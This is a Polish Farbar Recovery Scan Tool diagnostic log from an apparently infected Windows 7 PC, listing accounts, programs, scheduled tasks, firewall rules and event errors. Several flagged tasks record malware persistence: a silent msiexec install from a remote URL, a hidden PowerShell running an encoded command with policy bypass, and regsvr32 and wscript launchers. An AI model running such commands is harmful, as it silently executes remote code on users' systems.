Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 02.01.2018 Uruchomiony przez Ja (06-01-2018 18:56:07) Uruchomiony z C:\Users\Ja\Downloads Microsoft Windows 7 Professional Service Pack 1 (X86) (2017-01-04 06:25:43) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1393165460-243477947-2800629209-500 - Administrator - Disabled) Gość (S-1-5-21-1393165460-243477947-2800629209-501 - Limited - Disabled) Ja (S-1-5-21-1393165460-243477947-2800629209-1000 - Administrator - Enabled) => C:\Users\Ja ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Avast Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avast Antivirus (Disabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) Badanie mające na celu poprawę produktów HP Officejet Pro 6830 (HKLM\...\{ECD043A1-515D-4D7F-9275-C92310A72895}) (Version: 33.0.63.47385 - Hewlett-Packard Co.) Battle.net (HKLM\...\Battle.net) (Version: - Blizzard Entertainment) Epic Games Launcher (HKLM\...\{0F3B0E4D-F8F7-45FC-A661-100AE5495A31}) (Version: 1.1.133.0 - Epic Games, Inc.) Epic Games Launcher Prerequisites (x86) (HKLM\...\{B633DAAD-9294-4C7D-A625-D5B741A8C2B6}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Google Chrome (HKLM\...\Google Chrome) (Version: 63.0.3239.84 - Google Inc.) Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden Hearthstone (HKLM\...\Hearthstone) (Version: - Blizzard Entertainment) HP Officejet Pro 6830 — podstawowe oprogramowanie urządzenia (HKLM\...\{8B8BB22A-5B1C-40B9-A085-5E0CDEFDDD05}) (Version: 33.0.63.47385 - Hewlett-Packard Co.) HP Officejet Pro 6830 Pomoc (HKLM\...\{C0C062E8-B544-445A-A38E-DEEA486EA54A}) (Version: 33.0.0 - Hewlett Packard) HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) I.R.I.S. OCR (HKLM\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP) Launcher Prerequisites (x86) (HKLM\...\{ec50c375-be9a-4642-9b8c-86dcc42e39c3}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden League of Legends (HKLM\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc) Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation) Microsoft .NET Framework 4.7 (Polski) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.7.02053 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Origin (HKLM\...\Origin) (Version: 10.5.8.17910 - Electronic Arts, Inc.) Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.6 - TeamSpeak Systems GmbH) trotux - Uninstall (HKLM\...\{86BDF5F3-CC50-49E0-94D9-C1239B2DD277}) (Version: - ) <==== UWAGA Warframe (HKLM\...\{CCCC4D8B-DF26-4B87-9C95-CD79DE921556}) (Version: 1.0.0 - Digital Extremes) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) HKU\S-1-5-21-1393165460-243477947-2800629209-1000\...\ChromeHTML: -> "C:\Program Files\Eastness\Application\chrome.exe" "%1" <==== UWAGA ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers1: [AIMPClassic] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files\AIMP Classic\System\aimp_shell.dll [2007-05-13] (Artem Izmaylov) ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers4: [AIMPClassic] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files\AIMP Classic\System\aimp_shell.dll [2007-05-13] (Artem Izmaylov) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0000CAEE-BA36-4AED-8C47-0C7820405B91} - System32\Tasks\{0E544DB1-B9FF-FA1A-015B-F66C2572319A} => C:\ProgramData\{6B877452-DC2C-C3F9-F0E9-11513284F7B5}\218A4816-9621-FFBD-561D-973665502ACF.exe [2017-05-04] () <==== UWAGA Task: {1830C1B5-E252-4BE4-B7AF-6F9C8DF0CF25} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-12] (AVAST Software) Task: {297223C1-884D-4154-8530-B378C095F36E} - System32\Tasks\{08DCB6D5-BF77-017E-57AD-A0F9C5DA80AC} => C:\ProgramData\{2051A677-97FA-11DC-AB72-2E7165FD0627}\A3AFF046-1404-47ED-39DE-100B5DD43BF7.exe [2017-05-04] () <==== UWAGA Task: {5D73430C-D73E-4F66-B72C-E69D58C14F7C} - System32\Tasks\Tirationaneberse => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST9160411ASG_5TG1CE4CXXXX5TG1CE4C&v=201722 /q <==== UWAGA Task: {859D9D6E-0A90-4924-A037-A9E681F306D3} - System32\Tasks\{0979B2ED-58AF-4DB1-848D-26FFA0939AD4} => C:\Windows\system32\pcalua.exe -a "C:\Users\Ja\Downloads\FIFA_Manager_12_Free_Full_Version_Game [1].exe" -d C:\Users\Ja\Downloads Task: {8E3780B7-17A0-47E1-A546-B654C06F3786} - System32\Tasks\{0412CA95-B3B9-7D3E-916F-6A64F294CA8D} => C:\ProgramData\{15B80175-A213-B6DE-5ADC-DB6B3465FA74}\07CD52D9-B066-E572-B4C7-C4E0C5908799.exe [2017-05-04] () <==== UWAGA Task: {A3900F8B-798C-4019-9883-0286470019E9} - System32\Tasks\{22E2F65C-6175-8ACE-EB7D-4267B008732F} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\57612869\596df20f.dll" <==== UWAGA Task: {B624497B-B274-43E9-A8B0-68B22815B4E0} - System32\Tasks\HPCustParticipation HP Officejet Pro 6830 => C:\Program Files\HP\HP Officejet Pro 6830\Bin\HPCustPartic.exe [2014-01-16] (Hewlett-Packard Co.) Task: {C0566BFE-66EF-4FAC-BD3C-41B1AB14F840} - System32\Tasks\SMW_UpdateTask_Time_3638373037353238372d2d37505a2a6c55326c342341 => wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== UWAGA Task: {DA43372F-E5D9-4FE5-89C5-A6E1C6E148C9} - System32\Tasks\CD144EF0-EBE0-8690-1080-FF42C0880B4C => C:\Windows\system32\regsvr32.exe /n /s /i:"/02d02391816f39c5 /q" "C:\Users\Ja\AppData\Local\2ACBAE~1\{596DF~1." Task: {E48B95FA-F0D3-4893-B6BE-B02B944ED97C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2017-01-27] (Google Inc.) Task: {F2402448-60F9-495B-BAB6-1F6960D5FA10} - System32\Tasks\{DBC7F7A1-2700-4670-933E-1DC1D8153D2D} => C:\Users\Ja\Downloads\Gry\LeagueofLegends_EUNE_Installer_2016_11_10 (1).exe Task: {F596A267-7B32-4E89-AAA7-5D4FF7869676} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2017-01-27] (Google Inc.) Task: {F6EFB0AC-B7C7-4038-87E2-30B85AD53143} - System32\Tasks\{1CBB9B44-75C2-4D32-9803-AC670903AF55} => C:\Riot Games\League of Legends\LeagueClient.exe [2017-12-14] () Task: {FB93235B-07B4-4365-B2A7-B7A34C8C7780} - System32\Tasks\{244BB31B-692D-62D7-3AF8-C144EAE28F00} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\57612869\596df20f.dll" <==== UWAGA Task: {FD2A4DB2-76CF-4252-BAAD-B1C25C135AC8} - System32\Tasks\{08080E47-7E7E-0D0F-7E11-0A050E78110A} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAOwA7ACAAIAAgACAAIAAgADsAIAA7ACAAOwA7ACAAIAAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4A (dane wartości zawierają 9740 znaków więcej). <==== UWAGA (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h1szamobl20488au,787d078b-ae6f-4ca2-9640-05aeebc03dbe, ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h1szamobl20488au,787d078b-ae6f-4ca2-9640-05aeebc03dbe, ==================== Załadowane moduły (filtrowane) ============== 2017-02-02 17:37 - 2017-02-02 17:37 - 000275968 ____N () C:\Program Files\Terbaent Center\local32spl.dll 2017-02-08 15:24 - 2017-02-08 08:33 - 000487424 _____ () c:\programdata\microsoft\devicesync\localbackup.dll 2017-05-25 14:10 - 2017-05-31 06:14 - 000348160 _____ () C:\Users\Ja\AppData\Local\background_fault\bf.dll 2017-12-08 21:23 - 2017-11-29 06:09 - 000781088 _____ () C:\Program Files\Steam\SDL2.dll 2017-12-08 21:23 - 2016-09-01 02:02 - 004969248 _____ () C:\Program Files\Steam\v8.dll 2017-12-08 21:23 - 2016-09-01 02:02 - 001563936 _____ () C:\Program Files\Steam\icui18n.dll 2017-12-08 21:23 - 2016-09-01 02:02 - 001195296 _____ () C:\Program Files\Steam\icuuc.dll 2017-12-08 21:23 - 2017-12-15 20:59 - 002558752 _____ () C:\Program Files\Steam\video.dll 2017-12-14 13:06 - 2017-11-04 02:54 - 005137696 _____ () C:\Program Files\Steam\libavcodec-57.dll 2017-12-14 13:06 - 2017-11-04 02:54 - 000847136 _____ () C:\Program Files\Steam\libavutil-55.dll 2017-12-14 13:06 - 2017-11-04 02:54 - 000695584 _____ () C:\Program Files\Steam\libavformat-57.dll 2017-12-14 13:06 - 2017-11-04 02:54 - 000351520 _____ () C:\Program Files\Steam\libavresample-3.dll 2017-12-14 13:06 - 2017-11-04 02:54 - 000783648 _____ () C:\Program Files\Steam\libswscale-4.dll 2017-12-08 21:23 - 2017-12-15 20:59 - 000904992 _____ () C:\Program Files\Steam\bin\chromehtml.DLL 2017-12-08 21:23 - 2016-07-04 23:17 - 000266560 _____ () C:\Program Files\Steam\openvr_api.dll 2017-12-08 21:26 - 2017-09-07 03:04 - 000678400 _____ () C:\Program Files\Steam\bin\cef\cef.win7\SDL2.dll 2017-12-08 21:26 - 2017-10-31 05:44 - 071471904 _____ () C:\Program Files\Steam\bin\cef\cef.win7\libcef.dll 2017-12-08 21:23 - 2015-09-25 00:52 - 000119208 _____ () C:\Program Files\Steam\winh264.dll 2017-12-14 13:27 - 2017-12-06 04:48 - 002195800 _____ () C:\Program Files\Google\Chrome\Application\63.0.3239.84\swiftshader\libglesv2.dll 2017-12-14 13:27 - 2017-12-06 04:48 - 000111448 _____ () C:\Program Files\Google\Chrome\Application\63.0.3239.84\swiftshader\libegl.dll 2017-02-02 17:38 - 2017-02-02 17:38 - 000225792 ____H () C:\Program Files\Arofeingbanitain\DVDMakerArofeingbanitain.dll 2018-01-06 12:39 - 2018-01-06 18:55 - 001583104 _____ () C:\Users\Ja\AppData\Local\2ACBAEEE-CB1C-7688-2F23-59CF45778753\{596DF20F-DA66-0E0C-E15C-A6737A118478} ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:04 - 2018-01-06 18:55 - 000001894 _____ C:\Windows\system32\Drivers\etc\hosts 0.0.0.0 csgob0t.online ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1393165460-243477947-2800629209-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Ja\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 82.163.143.176 - 82.163.142.178 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{7DD69872-C8AC-479D-9FF6-9083AEC809BB}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe FirewallRules: [{5321369D-A32A-4499-9B7E-DA2B7A982A3F}] => (Allow) C:\Program Files\HP\HP Officejet Pro 6830\bin\FaxApplications.exe FirewallRules: [{37D31129-1F05-4133-A890-74D540BAEEF0}] => (Allow) C:\Program Files\HP\HP Officejet Pro 6830\bin\DigitalWizards.exe FirewallRules: [{7CA55E4D-4C91-4913-8D3E-AD7D773D6026}] => (Allow) C:\Program Files\HP\HP Officejet Pro 6830\bin\SendAFax.exe FirewallRules: [{CBDB1C76-7F8E-4729-9217-B317B73A5ABB}] => (Allow) C:\Program Files\HP\HP Officejet Pro 6830\Bin\DeviceSetup.exe FirewallRules: [{CC915AA6-0E3C-4EBF-8C06-DF3E58E55A82}] => (Allow) LPort=5357 FirewallRules: [{833D06C2-4736-444F-B25F-B3CBF0C153F7}] => (Allow) C:\Program Files\HP\HP Officejet Pro 6830\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{5261F71E-8CCA-4694-9DF4-A43AD1F307FF}] => (Allow) C:\Program Files\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{6F942020-5BE4-4553-93CF-4FCB49FCACA9}] => (Allow) C:\Program Files\Firefox\Firefox.exe FirewallRules: [{991039E0-4C57-4626-940D-1A4538585AE8}] => (Allow) C:\Program Files\MIO\loader\st9160411asg_5tg1ce4cxxxx5tg1ce4c.dat FirewallRules: [{0BE11B48-EA0E-4439-8272-5392E5993279}] => (Allow) C:\Program Files\MIO\loader\st9160411asg_5tg1ce4cxxxx5tg1ce4c.dat FirewallRules: [TCP Query User{F68AAF50-4C59-4D5B-AD73-8DF9CE07F6F1}C:\program files\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe FirewallRules: [UDP Query User{844327BD-FAE7-4C18-BAB6-F7533AB7A131}C:\program files\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe FirewallRules: [{110EF75D-F9B3-47AD-8B9C-7B7C48C1A820}] => (Block) C:\program files\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe FirewallRules: [{20405DA8-61FC-4CDB-804E-03BE32666EAE}] => (Block) C:\program files\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe FirewallRules: [{74C4BFB5-0BD6-4A3C-9059-FCB9B05EF2C3}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.exe FirewallRules: [{AE41BB34-C9A1-40A1-AB18-438C2C055F74}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{C4128829-1869-4167-A8D8-9C6C91215046}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.exe FirewallRules: [{6AD9F8AC-03D6-4808-A2CF-1E1C726BAA8B}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{40EBF3F1-1D65-4829-AE86-C7AC7D9FC69D}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{19FDC20E-EB78-4062-B33C-3E2441D1BEB9}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{36AE18C6-474D-40D3-BBE1-A17473AD54B3}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.exe FirewallRules: [{87D84693-A447-4DE2-9611-5945110B895E}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{BC5259F0-54EC-4480-A3F5-F140486F5387}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.exe FirewallRules: [{02E8FB82-3DF2-475C-A7D9-706FA6FDEF9D}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{9E7E8679-F61E-4F69-AE9A-68B91EA52C51}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{CD235BA2-E418-484B-897F-DE7BFAA7E0CE}] => (Allow) C:\Users\Ja\AppData\Local\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{B6F84160-E345-49F0-8263-A94FAE0B12AB}] => (Allow) C:\Program Files\Steam\Steam.exe FirewallRules: [{D9E6677F-A2FB-485D-93DA-40FC32B598B0}] => (Allow) C:\Program Files\Steam\Steam.exe FirewallRules: [{62E9E044-FDB4-4C95-AB03-C07B7EC0B38D}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{3833E0A5-0B07-420D-AB1F-AF6963B4F863}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{D8AEEA17-6D9F-4A15-8ED3-3352F145A030}] => (Allow) C:\Program Files\Steam\steamapps\common\Dirty Bomb\DirtyBombLauncher.exe FirewallRules: [{0BB5F5EB-A81D-4428-9171-798409D7CAF8}] => (Allow) C:\Program Files\Steam\steamapps\common\Dirty Bomb\DirtyBombLauncher.exe FirewallRules: [TCP Query User{DC006552-A0EC-47CB-8CC8-EA2278F035D5}C:\program files\steam\steamapps\common\dirty bomb\binaries\win32\shootergame-win32-shipping.exe] => (Allow) C:\program files\steam\steamapps\common\dirty bomb\binaries\win32\shootergame-win32-shipping.exe FirewallRules: [UDP Query User{C3B48A18-7D96-4663-B13B-6CEE637A3330}C:\program files\steam\steamapps\common\dirty bomb\binaries\win32\shootergame-win32-shipping.exe] => (Allow) C:\program files\steam\steamapps\common\dirty bomb\binaries\win32\shootergame-win32-shipping.exe FirewallRules: [TCP Query User{5717132B-B124-4FE7-89F8-D08CB3503582}C:\program files\hearthstone\hearthstone.exe] => (Allow) C:\program files\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{522D4AB0-08F7-4E4C-88DA-0872D5335DBB}C:\program files\hearthstone\hearthstone.exe] => (Allow) C:\program files\hearthstone\hearthstone.exe FirewallRules: [{78F07094-0D26-4DE7-8A6A-5D577FBE7D2F}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe ==================== Punkty Przywracania systemu ========================= 13-12-2017 08:04:10 Windows Update 19-12-2017 07:18:29 Windows Update 22-12-2017 08:49:20 Windows Update 26-12-2017 10:46:44 Windows Update 02-01-2018 07:52:10 Windows Update 04-01-2018 22:01:37 Operacja przywracania 05-01-2018 16:00:48 Windows Update ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: YAC Kit Driver Description: YAC Kit Driver Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: iSafeKrnlKit Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: YAC Ring3 Driver Description: YAC Ring3 Driver Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: iSafeKrnlR3 Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/06/2018 06:28:48 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (01/06/2018 06:14:07 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (01/06/2018 12:42:20 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: regsvr32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bca28 Nazwa modułu powodującego błąd: setup_x86.tmp, wersja: 0.0.0.0, sygnatura czasowa: 0x5a1e9d17 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00071fff Identyfikator procesu powodującego błąd: 0xfa0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d386e36631af4d Ścieżka aplikacji powodującej błąd: C:\Windows\system32\regsvr32.exe Ścieżka modułu powodującego błąd: C:\Users\Ja\AppData\Local\Temp\setup_x86.tmp Identyfikator raportu: a690893c-f2d6-11e7-9ca5-90e6ba8cbbc7 Error: (01/06/2018 12:33:46 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (01/06/2018 11:15:38 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: regsvr32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bca28 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23915, sygnatura czasowa: 0x59b94a7d Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0001fa50 Identyfikator procesu powodującego błąd: 0x2dbc Godzina uruchomienia aplikacji powodującej błąd: 0x01d386d6eeac8d79 Ścieżka aplikacji powodującej błąd: C:\Windows\system32\regsvr32.exe Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\ntdll.dll Identyfikator raportu: 8967e410-f2ca-11e7-9b1e-90e6ba8cbbc7 Error: (01/06/2018 11:13:19 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: regsvr32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bca28 Nazwa modułu powodującego błąd: setup_x86.tmp, wersja: 0.0.0.0, sygnatura czasowa: 0x5a33a00e Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00071fff Identyfikator procesu powodującego błąd: 0x2318 Godzina uruchomienia aplikacji powodującej błąd: 0x01d386d6d11af592 Ścieżka aplikacji powodującej błąd: C:\Windows\system32\regsvr32.exe Ścieżka modułu powodującego błąd: C:\Users\Ja\AppData\Local\Temp\setup_x86.tmp Identyfikator raportu: 36be5acc-f2ca-11e7-9b1e-90e6ba8cbbc7 Error: (01/06/2018 11:13:18 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: regsvr32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bca28 Nazwa modułu powodującego błąd: setup_x86.tmp, wersja: 0.0.0.0, sygnatura czasowa: 0x5a097016 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00071fff Identyfikator procesu powodującego błąd: 0x1f5c Godzina uruchomienia aplikacji powodującej błąd: 0x01d386d6d6fb5b3f Ścieżka aplikacji powodującej błąd: C:\Windows\system32\regsvr32.exe Ścieżka modułu powodującego błąd: C:\Users\Ja\AppData\Local\Temp\setup_x86.tmp Identyfikator raportu: 36a1ca49-f2ca-11e7-9b1e-90e6ba8cbbc7 Error: (01/06/2018 11:09:47 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (01/06/2018 10:04:08 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (01/05/2018 08:24:54 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program LeagueClientUx.exe w wersji 7.24.212.4555 zatrzymał interakcję z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemu w panelu sterowania Centrum akcji. Identyfikator procesu: 7f4 Godzina rozpoczęcia: 01d386598e08ba67 Godzina zakończenia: 97 Ścieżka aplikacji: C:\Riot Games\League of Legends\RADS\projects\league_client\releases\0.0.0.118\deploy\LeagueClientUx.exe Identyfikator raportu: Dziennik System: ============= Error: (01/06/2018 06:54:30 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (01/06/2018 06:34:14 PM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16398) (User: ZARZĄDZANIE NT) Description: Nie można utworzyć nowego zadania usługi BITS. Bieżąca liczba zadań dla użytkownika Komputer\Ja (129) jest równa lub większa limitowi zadań (60) określonemu w zasadach grupy. Aby rozwiązać problem, na podstawie komunikatu o błędzie 